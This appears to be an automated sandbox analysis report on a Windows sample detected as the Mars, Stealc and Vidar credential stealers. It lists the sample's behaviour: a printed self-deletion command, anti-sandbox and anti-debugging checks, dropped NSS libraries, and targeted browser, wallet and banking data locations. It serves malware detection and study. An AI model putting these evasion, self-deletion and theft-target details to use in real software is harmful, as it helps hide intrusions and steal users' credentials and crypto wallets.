Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: CBIEU37Q.0.dr, 2NOH4EKN.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: m0wsoI3.exe Virustotal: Detection: 82%
Source: m0wsoI3.exe ReversingLabs: Detection: 83%
Source: unknown Process created: C:\Users\user\Desktop\m0wsoI3.exe "C:\Users\user\Desktop\m0wsoI3.exe"
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: m0wsoI3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\m0wsoI3.exe Unpacked PE file: 0.2.m0wsoI3.exe.60900000.1.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00409220
PE file contains sections with non-standard names
Source: m0wsoI3.exe Static PE information: section name:
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60983000 pushad ; iretd 0_2_60983031
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096D990 push eax; ret 0_2_6096D9C0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60911F9E push ecx; mov dword ptr [esp], ebx 0_2_60911FD3
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60987F71 pushad ; iretd 0_2_60987F74
Source: m0wsoI3.exe Static PE information: section name: .text entropy: 7.245682295128179
Drops PE files
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_00415FC0
Source: C:\Users\user\Desktop\m0wsoI3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408370 0_2_00408370
Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408370 0_2_00408370
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 7924 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092A5DC sqlite3_os_init,GetSystemInfo, 0_2_6092A5DC
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: QIEKNGVA.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: QIEKNGVA.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: QIEKNGVA.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: QIEKNGVA.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000543000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: QIEKNGVA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: QIEKNGVA.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: QIEKNGVA.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1/
Source: QIEKNGVA.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: QIEKNGVA.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: QIEKNGVA.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: QIEKNGVA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: QIEKNGVA.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: QIEKNGVA.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: QIEKNGVA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\m0wsoI3.exe API call chain: ExitProcess graph end node
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004054F0 VirtualProtect ?,00000004,00000100,00000000 0_2_004054F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00409220
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0043C04C mov eax, dword ptr fs:[00000030h] 0_2_0043C04C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00415E60 mov eax, dword ptr fs:[00000030h] 0_2_00415E60
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] 0_2_00401000
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0043C0B2 mov eax, dword ptr fs:[00000030h] 0_2_0043C0B2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Source: C:\Users\user\Desktop\m0wsoI3.exe Memory protected: page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 0_2_0040CF60
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\m0wsoI3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_0040CE40
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_0040CE00
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_0040CEA0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary, 0_2_004084E0
Source: C:\Users\user\Desktop\m0wsoI3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Mars stealer
Source: Yara match File source: m0wsoI3.exe, type: SAMPLE
Source: Yara match File source: 0.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233026498.000000000043C000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300112411.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\s
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
